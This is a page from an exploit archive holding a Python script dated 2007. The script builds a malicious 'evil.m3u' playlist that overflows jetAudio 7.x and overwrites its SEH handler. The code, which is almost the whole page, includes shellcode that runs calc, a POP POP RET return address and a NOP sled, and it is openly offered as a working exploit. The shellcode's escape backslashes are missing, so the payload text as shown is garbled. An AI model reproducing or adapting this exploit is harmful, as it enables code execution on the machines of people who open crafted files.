jetAudio 7.x (m3u File) Local SEH Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : jetAudio 7.x (m3u File) Local SEH Overwrite Exploit
# Published : 2007-10-14
# Author : h07
# Previous Title : Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit
# Next Title : Adobe Album Starter 3.2 Unchecked Local Buffer Overflow Exploit

#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Just for fun  ;) 
##

from struct import pack

m3u = ("#EXTM3Unhttp://%s")

shellcode = (
"x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6"
"xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7"
"x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58"
"x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae"
"x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60"
"xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf"
"xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70"
"x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33"
"xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04"
"x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2")

NEXT_SEH_RECORD = 0x909006EB  # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA61F7       # POP POP RET (SHELL32.DLL / 2k SP4 Polish)

buf = "CLICK ME"
buf += "x20" * 1009
buf += pack("<L", NEXT_SEH_RECORD)
buf += pack("<L", SE_HANDLER)
buf += "x90" * 128
buf += shellcode

m3u %= buf

fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()

print "DONE"

# EoF

# www.Syue.com [2007-10-14]